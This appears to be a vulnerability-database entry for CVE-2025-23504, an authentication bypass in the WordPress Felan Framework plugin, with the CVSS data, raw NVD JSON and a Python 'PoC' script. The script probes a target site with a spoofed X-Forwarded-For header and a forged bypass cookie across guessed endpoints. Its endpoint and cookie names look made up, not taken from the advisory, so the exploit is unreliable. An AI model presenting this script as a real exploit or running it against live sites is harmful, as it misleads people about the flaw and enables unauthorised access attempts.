Security Vulnerability Report
中文
CVE-2025-23504 CVSS 9.8 CRITICAL

CVE-2025-23504

Published: 2026-01-08 10:15:49
Last Modified: 2026-04-15 00:35:42

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in RiceTheme Felan Framework felan-framework allows Authentication Abuse.This issue affects Felan Framework: from n/a through <= 1.1.3.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Felan Framework 所有版本 <= 1.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-23504 PoC - Felan Framework Authentication Bypass # Target: WordPress sites using Felan Framework <= 1.1.3 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-23504 """ # Try to bypass authentication using alternate path # Common vulnerable endpoints endpoints = [ '/wp-content/plugins/felan-framework/includes/auth-bypass.php', '/wp-content/themes/felan-framework/auth.php', '/wp-admin/admin-ajax.php?action=felan_auth_bypass', '/wp-content/felan-framework/api/auth/alternate', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'X-Forwarded-For': '127.0.0.1', 'Cookie': 'felan_auth_bypass=1' } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check for successful bypass indicators if response.status_code == 200 and ('wp-admin' in response.text or 'dashboard' in response.text): print(f'[+] VULNERABLE: {url}') print(f'[+] Authentication bypass successful') return True except requests.exceptions.RequestException: continue print('[-] Target may not be vulnerable or is not accessible') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-23504.py <target_url>') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-23504", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:48.513", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in RiceTheme Felan Framework felan-framework allows Authentication Abuse.This issue affects Felan Framework: from n/a through <= 1.1.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/felan-framework/vulnerability/wordpress-felan-framework-plugin-1-1-3-account-takeover-vulnerability?_s_id=cve", "source": "[email protected]"}]}}